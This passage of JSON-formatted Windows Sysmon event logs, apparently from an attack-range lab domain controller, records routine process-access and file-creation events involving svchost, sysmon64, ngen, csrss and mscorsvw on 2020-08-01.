06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7808,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7809,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7810,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7811,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:02","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7812,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:02.106\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:02.106","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7813,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:03.684\r\nProcessGuid: {A837DB8D-04DA-5F25-0000-001083871100}\r\nProcessId: 4240\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1090-0\\System.Web.dll\r\nCreationUtcTime: 2020-08-01 06:00:03.684","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:03.684","ProcessGuid":"{A837DB8D-04DA-5F25-0000-001083871100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1090-0\\System.Web.dll","CreationUtcTime":"2020-08-01 06:00:03.684","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7814,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:03.950\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04E3-5F25-0000-0010A0951100}\r\nTargetProcessId: 4260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:03.950","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04E3-5F25-0000-0010A0951100}","TargetProcessId":"4260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:03","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7815,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:03.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04E3-5F25-0000-0010A0951100}\r\nTargetProcessId: 4260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:03.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04E3-5F25-0000-0010A0951100}","TargetProcessId":"4260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
